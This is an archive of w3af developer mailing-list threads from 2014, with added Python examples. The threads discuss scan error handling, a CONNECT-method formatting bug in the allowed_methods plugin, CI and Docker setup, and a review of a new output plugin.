https://github.com/andresriancho/w3af/issues/4794

If that's too simple, then we can look into something else.

> Don't worry - I am not just some student who wants someone to do their homework for them, and then you will never hear from them again. I want to actively contribute to this project going forward - just looking for a bit of guidance for my first (small) contribution as we are under a short timeline for this assignment.

Cool! Feel free to contact me at #w3af, my nickname is __apr__

> Thank you all very much and I look forward to being a part of the W3af developer community!

Welcome!

> - JB

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
From: Chuck F. <cf...@gm...> - 2014-09-15 16:34:53
Good Morning Everyone,

I am a Computer Science student that is very interested in web security and penetration testing (about to begin studying for my OSCP!). For my Software Engineering class we have been asked to make a small contribution to an open-source project - so what better project to contribute to than W3af! I am very familiar with the concept of open-source projects, however outside of creating a Wordpress plugin, I have not contributed to one.

Anyways, I was browsing through the Issues in the Github repo but I feel like I might be too green to tackle some of those (despite some Python experience). I wanted to reach out and see if there are any small bugs or maybe an update to some Documentation or something that you guys might be able to recommend for me to update.

Don't worry - I am not just some student who wants someone to do their homework for them, and then you will never hear from them again. I want to actively contribute to this project going forward - just looking for a bit of guidance for my first (small) contribution as we are under a short timeline for this assignment.

Thank you all very much and I look forward to being a part of the W3af developer community!

- JB
From: Andres R. <and...@gm...> - 2014-09-04 23:38:08
List,

I'm currently working on (the much needed) error handling "feature" for w3af [0], the user story says:

"""
I would like to have better handling for the case in which:
* My network connection died for a couple of seconds
* The server went offline for a couple of seconds

Currently w3af doesn't support this and will return an error, as a user I would like w3af to auto-pause testing for some seconds and auto-resume. This auto-pause feature should enable itself at most three times in a row, if the server is still down w3af should return an error.
"""

Now that I have to code it, I'm wondering... what's the best strategy for doing this? My initial ideas are:

Assumptions
-----------------
Define fail as connection timeout, connection reset, host not reachable, etc. (most socket errors)

Naive strategy
-------------------
* Define a MAX_CONSECUTIVE_ERRORS constant. If we reach it, stop the whole scan.
* When one of the HTTP requests fails, delay all the following ones for a couple of seconds
* If the next requests succeed, just continue as if nothing happened
* If they failed, keep delaying for a couple of seconds until we recover OR reach MAX_CONSECUTIVE_ERRORS limit and stop the scan

% of MAX_CONSECUTIVE_ERRORS
---------------------------------------------------
* Define a MAX_CONSECUTIVE_ERRORS constant. If we reach it, stop the whole scan.
* When one HTTP request fails, increase a counter (Only increase it if the previous one also failed)
* When we reach 30% of MAX_CONSECUTIVE_ERRORS we delay all the following HTTP requests hoping that the server/connection will recover
* If MAX_CONSECUTIVE_ERRORS is reached, then stop the scan

Does anyone know if there are papers on network error handling for cases like this? What's the best algorithm?

[0] https://github.com/andresriancho/w3af/issues/4811

Regards,

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
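An added example, not w3af code, of the second strategy sketched above (counter of consecutive failures, delay from 30% of MAX_CONSECUTIVE_ERRORS on, scan stopped at the limit). Class and function names are assumptions, the counter is assumed to reset on the first success, and the sleep callable is injectable so the simulation at the bottom runs offline:

```python
"""Consecutive network-failure tracker for a scanner's HTTP layer.

Added example of the "% of MAX_CONSECUTIVE_ERRORS" strategy from the email;
it is not w3af code. Assumption: the counter resets on the first success,
so it always reflects the current run of consecutive failures.
"""
import socket
import time

# "fail" as defined in the email: timeouts, resets, unreachable hosts, ...
NETWORK_ERRORS = (socket.error, socket.timeout)


class ScanMustStop(Exception):
    """Raised when MAX_CONSECUTIVE_ERRORS has been reached."""


class ConsecutiveErrorTracker(object):
    def __init__(self, max_errors=10, delay_at_percent=30,
                 delay_seconds=2.0, sleep=time.sleep):
        if max_errors < 1:
            raise ValueError("max_errors must be >= 1")
        self.max_errors = max_errors
        # Integer arithmetic so 30% of 10 is exactly 3, with no float rounding.
        self.delay_threshold = max(1, max_errors * delay_at_percent // 100)
        self.delay_seconds = delay_seconds
        self._sleep = sleep          # injectable so tests need not block
        self._consecutive = 0

    @property
    def consecutive_errors(self):
        return self._consecutive

    def delay_needed(self):
        """True once the run of failures reached the 30% threshold."""
        return self._consecutive >= self.delay_threshold

    def before_request(self):
        """Call before every HTTP request: pauses while the server looks down."""
        if self.delay_needed():
            self._sleep(self.delay_seconds)

    def record_success(self):
        self._consecutive = 0

    def record_failure(self):
        self._consecutive += 1
        if self._consecutive >= self.max_errors:
            raise ScanMustStop("%d consecutive network errors, stopping the scan"
                               % self._consecutive)


def guarded_send(tracker, send):
    """Run one request (a zero-argument callable) through the tracker.

    Returns the response, or None when the request failed with a network
    error. Non-network exceptions propagate untouched; ScanMustStop is raised
    once the limit is hit.
    """
    tracker.before_request()
    try:
        response = send()
    except NETWORK_ERRORS:
        tracker.record_failure()
        return None
    tracker.record_success()
    return response


def simulate(outcomes, max_errors=10):
    """Drive the tracker with a constructed outcome sequence ("ok" / "fail").

    Returns (requests_attempted, delays_applied, scan_stopped).
    """
    delays = []
    tracker = ConsecutiveErrorTracker(max_errors=max_errors, sleep=delays.append)
    attempted = 0
    stopped = False
    for outcome in outcomes:
        def send(outcome=outcome):
            if outcome == "fail":
                raise socket.error("constructed: connection reset by peer")
            return "HTTP/1.1 200 OK"
        attempted += 1
        try:
            guarded_send(tracker, send)
        except ScanMustStop:
            stopped = True
            break
    return attempted, len(delays), stopped


if __name__ == "__main__":
    # Three failures, then the server recovers: one pause, no abort.
    print(simulate(["fail"] * 3 + ["ok"] * 2))   # (5, 1, False)
    # Server stays down: pauses from the 4th request on, abort at the 10th.
    print(simulate(["fail"] * 12))               # (10, 7, True)
```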
From: Andres R. <and...@gm...> - 2014-08-29 18:28:38
List,

CircleCI, the continuous integration SaaS we use for building w3af, is now providing a beta feature that allows open source projects to show their CI builds. I've enabled the feature and now you're able to see all the unit/functional tests run each time we change something in w3af:

https://circleci.com/gh/andresriancho/w3af

Regards,

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
From: Sergio A <foo...@gm...> - 2014-08-06 06:51:37
OK thanks a lot for your response. I'll experiment with extended_urllib.py and also try to fix the duplicates in the output.

Thanks

On Wed, Aug 6, 2014 at 12:15 AM, Andres Riancho <and...@gm...> wrote:
> Sergio,
>
> On Tue, Aug 5, 2014 at 5:42 PM, Sergio A <foo...@gm...> wrote:
>> Hi guys,
>>
>> Yesterday, while "playing" with w3af I saw something (detailed below) with the "allowed methods" plugin related to checking if the http CONNECT method is available in a server or not and I'd like to know if you think it could be a bug or not.
>>
>> In the case you think it is a bug, I'd be very happy if I can fix it and, if possible, would like some advice or guidelines on what next steps you think I should do to implement the fix. The problem is that I'm not a python guru like you at all, currently I just know some python for my day to day stuff. And if it is not a bug, I'd like as well to contribute. So guidelines, advice, etc on how to do it are welcome :)
>>
>> Here is what I did:
>>
>> 1. git pull the last w3af version.
>>
>> 2. setup an apache server as a forward proxy
>>
>> Setup an apache web server that has enabled the CONNECT method for proxying clients (forward proxy not reverse proxy) so they can navigate setting the apache box as their proxy (the only client I'm testing now is on the same host hence Allow from 127.0.0.1). This is the relevant apache config I have (apart from the enabled mod_proxy modules, etc):
>>
>> <VirtualHost *:80>
>> ProxyRequests On
>> ProxyVia On
>> AllowCONNECT 80 443 563
>> </VirtualHost>
>>
>> <Proxy *>
>> Order deny,allow
>> Deny from all
>> Allow from 127.0.0.1
>> </Proxy>
>>
>> 3. Manually check CONNECT method is working
>>
>> (look at the format on the CONNECT line):
>>
>> bla@ubuntu:~$ telnet localhost 80
>> Trying 127.0.0.1...
>> Connected to localhost.
>> Escape character is '^]'.
>> CONNECT google.com:80 HTTP/1.1
>> HOST: google.com
>>
>> HTTP/1.0 200 Connection Established <--- it worked
>> Proxy-agent: Apache/2.4.7 (Ubuntu)
>>
>> blablablabla
>>
>> HTTP/1.0 400 Bad Request <---- this is normal because blablabla is a bad request
>> Content-Type: text/html; charset=UTF-8
>> Content-Length: 1419
>> Date: Mon, 04 Aug 2014 18:13:32 GMT
>> Server: GFE/2.0
>> <snip>
>
> Ok, so far so good :) I understood the setup.
>
>> 4. Setup a w3af profile for checking CONNECT method
>>
>> I setup a profile enabling only "allowed methods" plugin and this is what I see as the output of that plugin:
>>
>> """ The URL "http://localhost/" has the following enabled HTTP methods: CONNECT, GET, GET, HEAD, HEAD, OPTIONS, OPTIONS, POST, POST. This information was found in the requests with ids 32, 39, 47, 52, 55 and 71. """
>
> Strange to see that there are duplicated methods! GET/GET, HEAD/HEAD, etc. ugly at least.
>
>> Note that, apart from all the methods but CONNECT being duplicated, what I see when going into request/response navigator for the CONNECT request (which is the one with id 55) is (look on the CONNECT line format):
>>
>> Request:
>> CONNECT http://localhost/ HTTP/1.1
>> Host: localhost
>> Accept-encoding: gzip, deflate
>> Accept: */*
>> User-agent: w3af.org
>>
>> Response:
>> HTTP/1.1 400 Bad Request
>> date: Mon, 04 Aug 2014 16:57:55 GMT
>> content-length: 300
>> content-type: text/html; charset=iso-8859-1
>> connection: close
>> server: Apache/2.4.7 (Ubuntu)
>>
>> But, if I run again the same w3af profile and look with wireshark what I see "on the wire" (look here as well in the CONNECT line) is:
>>
>> Request:
>> CONNECT / HTTP/1.1
>> Host: localhost
>> Accept-encoding: gzip, deflate
>> Accept: */*
>> User-agent: w3af.org
>
> Ah, yes, that's a "bug" in the representation of the HTTP requests. It is "known" (and ugly) that w3af sends:
>
> CONNECT / HTTP/1.1
> Host: localhost
> Accept-encoding: gzip, deflate
> Accept: */*
> User-agent: w3af.org
>
> And this is recorded in the log/shown in the GUI:
>
> CONNECT http://localhost/ HTTP/1.1
> Host: localhost
> Accept-encoding: gzip, deflate
> Accept: */*
> User-agent: w3af.org
>
> This was done to avoid adding host/port/protocol fields in the GUI and text files. Does that make sense? Not sure. But now we just show:
>
> CONNECT http://localhost/ HTTP/1.1
>
> And all the information is there. In an enhanced version we could have a different GUI design with more widgets showing:
>
> Protocol: http
> Port: 80
> Host: localhost
> Request:
> CONNECT / HTTP/1.1
>
> That would be the ideal case.
>
> For your tests with the CONNECT method this is especially confusing.
>
>> Response:
>> HTTP/1.1 400 Bad Request
>> Date: Mon, 04 Aug 2014 17:06:57 GMT
>> Server: Apache/2.4.7 (Ubuntu)
>> Content-Length: 300
>> Connection: close
>> Content-Type: text/html; charset=iso-8859-1
>>
>> So in summary:
>>
>> (A) Manual request (which works):
>> CONNECT google.com:80 HTTP/1.1
>>
>> (B) w3af Request/Response navigator reported request:
>> CONNECT http://localhost/ HTTP/1.1
>>
>> (C) w3af on the wire request:
>> CONNECT / HTTP/1.1
>>
>> I think that according to the RFC it looks like a valid request should have just a hostname, a colon and a port, like (A) and not like (B) nor (C):
>> http://tools.ietf.org/html/rfc7231#section-4.3.6
>>
>> Do you think this could be a bug or issue on how w3af generates a CONNECT request?
>
> * There is room for improvement in the way we show the request in the GUI and store it in the log files.
>
> * In the allowed_methods plugin [0] we don't treat CONNECT in any special way (it has a different format from the rest of the methods but the plugin doesn't "know" about that)
>
> [0] https://github.com/andresriancho/w3af/blob/master/w3af/plugins/infrastructure/allowed_methods.py
>
>> Also, how about the duplicates in the plugin output (I mean method names appearing here twice on all but CONNECT):
>> "The URL "http://localhost/" has the following enabled HTTP methods: CONNECT, GET, GET, HEAD, HEAD, OPTIONS, OPTIONS, POST, POST. This information was found in the requests with ids 32, 39, 47, 52, 55 and 71."
>
> That's a bug
>
>> 5. Digging a bit
>>
>> I went through the code trying to read it, and I think the connect request is generated in:
>> w3af.core.data.url.extended_urllib.AnyMethod
>
> The request is sent here [1] and then it is passed through the AnyMethod (nice find there!).
>
> [1] https://github.com/andresriancho/w3af/blob/master/w3af/plugins/infrastructure/allowed_methods.py#L174
>
>> But I'm not sure on where you think it could be a good place to fix it and how (of course in the case you think there's a bug).
>
> The best place to fix this might be the allowed_methods.py plugin + extended_urllib.py, but it might be *really* difficult to fix since we don't have support for sending "raw" text, and:
>
> CONNECT google.com:80 HTTP/1.1
> HOST: google.com
>
> Might be "difficult" to send the "google.com:80". My advice is that you should experiment with extended_urllib.py and wireshark to see if you can make it send what you need, and then (if you got it) write a new method in allowed_methods.py. This can help get you started with your tests:
>
> pedro@laptop:~/pch/w3af$ python
> Python 2.7.3 (default, Feb 27 2014, 19:58:35)
> [GCC 4.6.3] on linux2
> Type "help", "copyright", "credits" or "license" for more information.
> >>> from w3af.core.data.url.extended_urllib import ExtendedUrllib
> >>> from w3af.core.data.parsers.url import URL
> >>> from w3af.core.data.dc.headers import Headers
> >>> xu = ExtendedUrllib()
> >>> xu.CONNECT(URL('http://google.com:80/'), headers=Headers([('Host', 'www.google.com')]))
> <HTTPResponse | 400 | http://google.com/ | id:1>
> >>>
>
> Regards,
>
>> Regards
>
> --
> Andrés Riancho
> Project Leader at w3af - http://w3af.org/
> Web Application Attack and Audit Framework
> Twitter: @w3af
> GPG: 0x93C344F3
From: Andres R. <and...@gm...> - 2014-08-06 03:29:55
List,

I've been working on a docker image for w3af [0], for those who've been experimenting with the technology, could you give it a try and let me know what you think?

If you want to help improve this docker image, the Dockerfile is here [1] and pull requests are welcome.

I'll wait a week or so to get your reviews and then send an announcement to the users mailing list.

Thanks!

[0] https://registry.hub.docker.com/u/andresriancho/w3af/
[1] https://github.com/andresriancho/w3af/blob/develop/extras/Dockerfile

Regards,

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
From: Andres R. <and...@gm...> - 2014-08-05 23:15:31
Sergio,

On Tue, Aug 5, 2014 at 5:42 PM, Sergio A <foo...@gm...> wrote:
> Hi guys,
>
> Yesterday, while "playing" with w3af I saw something (detailed below) with the "allowed methods" plugin related to checking if the http CONNECT method is available in a server or not and I'd like to know if you think it could be a bug or not.
>
> In the case you think it is a bug, I'd be very happy if I can fix it and, if possible, would like some advice or guidelines on what next steps you think I should do to implement the fix. The problem is that I'm not a python guru like you at all, currently I just know some python for my day to day stuff. And if it is not a bug, I'd like as well to contribute. So guidelines, advice, etc on how to do it are welcome :)
>
> Here is what I did:
>
> 1. git pull the last w3af version.
>
> 2. setup an apache server as a forward proxy
>
> Setup an apache web server that has enabled the CONNECT method for proxying clients (forward proxy not reverse proxy) so they can navigate setting the apache box as their proxy (the only client I'm testing now is on the same host hence Allow from 127.0.0.1). This is the relevant apache config I have (apart from the enabled mod_proxy modules, etc):
>
> <VirtualHost *:80>
> ProxyRequests On
> ProxyVia On
> AllowCONNECT 80 443 563
> </VirtualHost>
>
> <Proxy *>
> Order deny,allow
> Deny from all
> Allow from 127.0.0.1
> </Proxy>
>
> 3. Manually check CONNECT method is working
>
> (look at the format on the CONNECT line):
>
> bla@ubuntu:~$ telnet localhost 80
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
> CONNECT google.com:80 HTTP/1.1
> HOST: google.com
>
> HTTP/1.0 200 Connection Established <--- it worked
> Proxy-agent: Apache/2.4.7 (Ubuntu)
>
> blablablabla
>
> HTTP/1.0 400 Bad Request <---- this is normal because blablabla is a bad request
> Content-Type: text/html; charset=UTF-8
> Content-Length: 1419
> Date: Mon, 04 Aug 2014 18:13:32 GMT
> Server: GFE/2.0
> <snip>

Ok, so far so good :) I understood the setup.

> 4. Setup a w3af profile for checking CONNECT method
>
> I setup a profile enabling only "allowed methods" plugin and this is what I see as the output of that plugin:
>
> """ The URL "http://localhost/" has the following enabled HTTP methods: CONNECT, GET, GET, HEAD, HEAD, OPTIONS, OPTIONS, POST, POST. This information was found in the requests with ids 32, 39, 47, 52, 55 and 71. """

Strange to see that there are duplicated methods! GET/GET, HEAD/HEAD, etc. ugly at least.

> Note that, apart from all the methods but CONNECT being duplicated, what I see when going into request/response navigator for the CONNECT request (which is the one with id 55) is (look on the CONNECT line format):
>
> Request:
> CONNECT http://localhost/ HTTP/1.1
> Host: localhost
> Accept-encoding: gzip, deflate
> Accept: */*
> User-agent: w3af.org
>
> Response:
> HTTP/1.1 400 Bad Request
> date: Mon, 04 Aug 2014 16:57:55 GMT
> content-length: 300
> content-type: text/html; charset=iso-8859-1
> connection: close
> server: Apache/2.4.7 (Ubuntu)
>
> But, if I run again the same w3af profile and look with wireshark what I see "on the wire" (look here as well in the CONNECT line) is:
>
> Request:
> CONNECT / HTTP/1.1
> Host: localhost
> Accept-encoding: gzip, deflate
> Accept: */*
> User-agent: w3af.org

Ah, yes, that's a "bug" in the representation of the HTTP requests. It is "known" (and ugly) that w3af sends:

CONNECT / HTTP/1.1
Host: localhost
Accept-encoding: gzip, deflate
Accept: */*
User-agent: w3af.org

And this is recorded in the log/shown in the GUI:

CONNECT http://localhost/ HTTP/1.1
Host: localhost
Accept-encoding: gzip, deflate
Accept: */*
User-agent: w3af.org

This was done to avoid adding host/port/protocol fields in the GUI and text files. Does that make sense? Not sure. But now we just show:

CONNECT http://localhost/ HTTP/1.1

And all the information is there. In an enhanced version we could have a different GUI design with more widgets showing:

Protocol: http
Port: 80
Host: localhost
Request:
CONNECT / HTTP/1.1

That would be the ideal case.

For your tests with the CONNECT method this is especially confusing.

> Response:
> HTTP/1.1 400 Bad Request
> Date: Mon, 04 Aug 2014 17:06:57 GMT
> Server: Apache/2.4.7 (Ubuntu)
> Content-Length: 300
> Connection: close
> Content-Type: text/html; charset=iso-8859-1
>
> So in summary:
>
> (A) Manual request (which works):
> CONNECT google.com:80 HTTP/1.1
>
> (B) w3af Request/Response navigator reported request:
> CONNECT http://localhost/ HTTP/1.1
>
> (C) w3af on the wire request:
> CONNECT / HTTP/1.1
>
> I think that according to the RFC it looks like a valid request should have just a hostname, a colon and a port, like (A) and not like (B) nor (C):
> http://tools.ietf.org/html/rfc7231#section-4.3.6
>
> Do you think this could be a bug or issue on how w3af generates a CONNECT request?

* There is room for improvement in the way we show the request in the GUI and store it in the log files.

* In the allowed_methods plugin [0] we don't treat CONNECT in any special way (it has a different format from the rest of the methods but the plugin doesn't "know" about that)

[0] https://github.com/andresriancho/w3af/blob/master/w3af/plugins/infrastructure/allowed_methods.py

> Also, how about the duplicates in the plugin output (I mean method names appearing here twice on all but CONNECT):
> "The URL "http://localhost/" has the following enabled HTTP methods: CONNECT, GET, GET, HEAD, HEAD, OPTIONS, OPTIONS, POST, POST. This information was found in the requests with ids 32, 39, 47, 52, 55 and 71."

That's a bug

> 5. Digging a bit
>
> I went through the code trying to read it, and I think the connect request is generated in:
> w3af.core.data.url.extended_urllib.AnyMethod

The request is sent here [1] and then it is passed through the AnyMethod (nice find there!).

[1] https://github.com/andresriancho/w3af/blob/master/w3af/plugins/infrastructure/allowed_methods.py#L174

> But I'm not sure on where you think it could be a good place to fix it and how (of course in the case you think there's a bug).

The best place to fix this might be the allowed_methods.py plugin + extended_urllib.py, but it might be *really* difficult to fix since we don't have support for sending "raw" text, and:

CONNECT google.com:80 HTTP/1.1
HOST: google.com

Might be "difficult" to send the "google.com:80". My advice is that you should experiment with extended_urllib.py and wireshark to see if you can make it send what you need, and then (if you got it) write a new method in allowed_methods.py. This can help get you started with your tests:

pedro@laptop:~/pch/w3af$ python
Python 2.7.3 (default, Feb 27 2014, 19:58:35)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from w3af.core.data.url.extended_urllib import ExtendedUrllib
>>> from w3af.core.data.parsers.url import URL
>>> from w3af.core.data.dc.headers import Headers
>>> xu = ExtendedUrllib()
>>> xu.CONNECT(URL('http://google.com:80/'), headers=Headers([('Host', 'www.google.com')]))
<HTTPResponse | 400 | http://google.com/ | id:1>
>>>

Regards,

> Regards

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
From: Sergio A <foo...@gm...> - 2014-08-05 20:42:20
Hi guys,

Yesterday, while "playing" with w3af I saw something (detailed below) with the "allowed methods" plugin related to checking if the http CONNECT method is available in a server or not and I'd like to know if you think it could be a bug or not.

In the case you think it is a bug, I'd be very happy if I can fix it and, if possible, would like some advice or guidelines on what next steps you think I should do to implement the fix. The problem is that I'm not a python guru like you at all, currently I just know some python for my day to day stuff. And if it is not a bug, I'd like as well to contribute. So guidelines, advice, etc on how to do it are welcome :)

Here is what I did:

1. git pull the last w3af version.

2. setup an apache server as a forward proxy

Setup an apache web server that has enabled the CONNECT method for proxying clients (forward proxy not reverse proxy) so they can navigate setting the apache box as their proxy (the only client I'm testing now is on the same host hence Allow from 127.0.0.1). This is the relevant apache config I have (apart from the enabled mod_proxy modules, etc):

<VirtualHost *:80>
ProxyRequests On
ProxyVia On
AllowCONNECT 80 443 563
</VirtualHost>

<Proxy *>
Order deny,allow
Deny from all
Allow from 127.0.0.1
</Proxy>

3. Manually check CONNECT method is working

(look at the format on the CONNECT line):

bla@ubuntu:~$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
CONNECT google.com:80 HTTP/1.1
HOST: google.com

HTTP/1.0 200 Connection Established <--- it worked
Proxy-agent: Apache/2.4.7 (Ubuntu)

blablablabla

HTTP/1.0 400 Bad Request <---- this is normal because blablabla is a bad request
Content-Type: text/html; charset=UTF-8
Content-Length: 1419
Date: Mon, 04 Aug 2014 18:13:32 GMT
Server: GFE/2.0
<snip>

4. Setup a w3af profile for checking CONNECT method

I setup a profile enabling only "allowed methods" plugin and this is what I see as the output of that plugin:

""" The URL "http://localhost/" has the following enabled HTTP methods: CONNECT, GET, GET, HEAD, HEAD, OPTIONS, OPTIONS, POST, POST. This information was found in the requests with ids 32, 39, 47, 52, 55 and 71. """

Note that, apart from all the methods but CONNECT being duplicated, what I see when going into request/response navigator for the CONNECT request (which is the one with id 55) is (look on the CONNECT line format):

Request:
CONNECT http://localhost/ HTTP/1.1
Host: localhost
Accept-encoding: gzip, deflate
Accept: */*
User-agent: w3af.org

Response:
HTTP/1.1 400 Bad Request
date: Mon, 04 Aug 2014 16:57:55 GMT
content-length: 300
content-type: text/html; charset=iso-8859-1
connection: close
server: Apache/2.4.7 (Ubuntu)

But, if I run again the same w3af profile and look with wireshark what I see "on the wire" (look here as well in the CONNECT line) is:

Request:
CONNECT / HTTP/1.1
Host: localhost
Accept-encoding: gzip, deflate
Accept: */*
User-agent: w3af.org

Response:
HTTP/1.1 400 Bad Request
Date: Mon, 04 Aug 2014 17:06:57 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Length: 300
Connection: close
Content-Type: text/html; charset=iso-8859-1

So in summary:

(A) Manual request (which works):
CONNECT google.com:80 HTTP/1.1

(B) w3af Request/Response navigator reported request:
CONNECT http://localhost/ HTTP/1.1

(C) w3af on the wire request:
CONNECT / HTTP/1.1

I think that according to the RFC it looks like a valid request should have just a hostname, a colon and a port, like (A) and not like (B) nor (C):
http://tools.ietf.org/html/rfc7231#section-4.3.6

Do you think this could be a bug or issue on how w3af generates a CONNECT request?

Also, how about the duplicates in the plugin output (I mean method names appearing here twice on all but CONNECT):
"The URL "http://localhost/" has the following enabled HTTP methods: CONNECT, GET, GET, HEAD, HEAD, OPTIONS, OPTIONS, POST, POST. This information was found in the requests with ids 32, 39, 47, 52, 55 and 71."

5. Digging a bit

I went through the code trying to read it, and I think the connect request is generated in:
w3af.core.data.url.extended_urllib.AnyMethod

But I'm not sure on where you think it could be a good place to fix it and how (of course in the case you think there's a bug).

Regards
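The three request-lines (A), (B) and (C) compared in this thread, as an added example that is not w3af code: a checker that names the RFC 7230 request-target form and accepts CONNECT only in the authority form host:port required by RFC 7231 section 4.3.6, a builder that emits the form the manual telnet test used, and a de-duplicator for the plugin's method list. All function names are assumptions; the sample request-lines are the ones quoted in the thread.

```python
"""Request-target checks for the HTTP CONNECT method.

Added example, not w3af code. RFC 7231 section 4.3.6 allows only the
authority form ("host:port") as a CONNECT request-target; the absolute form
"http://localhost/" and the origin form "/" seen in the thread are the kind
of target a proxy answers with 400.
"""
import re

# authority-form = host ":" port, where host is a reg-name, an IPv4 literal
# or a bracketed IPv6 literal (RFC 3986 characters; percent-encoding allowed).
_AUTHORITY_FORM = re.compile(
    r"^(?P<host>\[[0-9A-Fa-f:.]+\]|[A-Za-z0-9._~%!$&'()*+,;=-]+)"
    r":(?P<port>[0-9]{1,5})$")
_ABSOLUTE_FORM = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")


def classify_target(target):
    """Name the RFC 7230 request-target form of one token, or "invalid"."""
    if target == "*":
        return "asterisk-form"
    if target.startswith("/"):
        return "origin-form"
    if _ABSOLUTE_FORM.match(target):
        return "absolute-form"
    m = _AUTHORITY_FORM.match(target)
    if m and 0 <= int(m.group("port")) <= 65535:
        return "authority-form"
    return "invalid"


def check_request_line(line):
    """Return (ok, form) for a request-line such as "CONNECT host:80 HTTP/1.1".

    CONNECT is only ok in authority form; any other method is ok in origin,
    absolute (proxy) or asterisk form.
    """
    parts = line.strip().split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return False, "malformed"
    method, target, _version = parts
    form = classify_target(target)
    if method == "CONNECT":
        return form == "authority-form", form
    return form in ("origin-form", "absolute-form", "asterisk-form"), form


def build_connect_request(host, port):
    """Build the bytes of a CONNECT request in the form the telnet test (A) used."""
    if not 0 <= port <= 65535:
        raise ValueError("port out of range: %r" % port)
    authority = "%s:%d" % (host, port)
    line = "CONNECT %s HTTP/1.1" % authority
    ok, form = check_request_line(line)
    if not ok:
        raise ValueError("not a valid CONNECT target (%s): %r" % (form, authority))
    # RFC 7230 section 5.4: when the target carries an authority, the Host
    # field value must be identical to it.
    return ("%s\r\nHost: %s\r\n\r\n" % (line, authority)).encode("ascii")


def unique_methods(methods):
    """De-duplicate a reported method list (the GET, GET, HEAD, HEAD output)."""
    return sorted(set(m.upper() for m in methods))


if __name__ == "__main__":
    for sample in ("CONNECT google.com:80 HTTP/1.1",      # (A)
                   "CONNECT http://localhost/ HTTP/1.1",  # (B)
                   "CONNECT / HTTP/1.1"):                 # (C)
        print(sample, "->", check_request_line(sample))
    print(build_connect_request("google.com", 80))
```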
From: Andres R. <and...@gm...> - 2014-05-04 23:44:21
List,

This [0] strange encoding issue, which only happens when the URL contains "weird unicode chars", is driving me crazy. Any encoding expert out there that can help out?

[0] https://github.com/andresriancho/w3af/issues/580

Regards,

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
From: Andres R. <and...@gm...> - 2014-05-04 15:08:23
List,

I'm taking vacations from 9 to 23 May, so don't expect any answers/help from me during this time. Before leaving I'll try to close all the pull-requests and open questions.

Regards,

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
From: Andres R. <and...@gm...> - 2014-05-03 13:07:24
John,

Thanks for your interest in w3af and for contributing back by writing this plugin :)

The plugin looks good, but the following is required for it to make it into w3af:

* Code clean-up: NON_BIN is not used, str is duplicated from a different plugin, the output default doesn't work on windows (/tmp/f5_asm_import.xml), error method lacks a "pass", strTargets is not pep8.

* There are no unittests for the plugin, and this is a requirement for any new plugin we add to the framework. At least three tests are required:
  - Check that the output matches an XSD
  - Check that the plugin can handle known vulnerabilities (as defined in _attack_type)
  - Check that the plugin can handle unknown vulnerabilities
  It should be easy for you to write these plugins using these two [1][2]. Tests are run using "nosetests path/to/test_foo.py"

* Once all those changes are done, follow [0] that will explain to you how to create a pull request

Please CC the w3af-develop mailing list on all following answers, I would love the community to review your code too

[0] https://github.com/andresriancho/w3af/wiki/Contributing-101
[1] https://github.com/andresriancho/w3af/blob/master/w3af/plugins/tests/output/test_xml_file.py
[2] https://github.com/andresriancho/w3af/blob/master/w3af/plugins/output/xml_file/report.xsd

Regards,

On Fri, May 2, 2014 at 11:04 PM, John Stauffacher <joh...@gm...> wrote:
> Andres,
>
> I took some time to write a plugin for w3af that outputs an xml file needed to import into F5 ASM. The github repo is here:
>
> https://github.com/geekspeed/w3af_asm
>
> How would I go about getting it into the main branch?

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3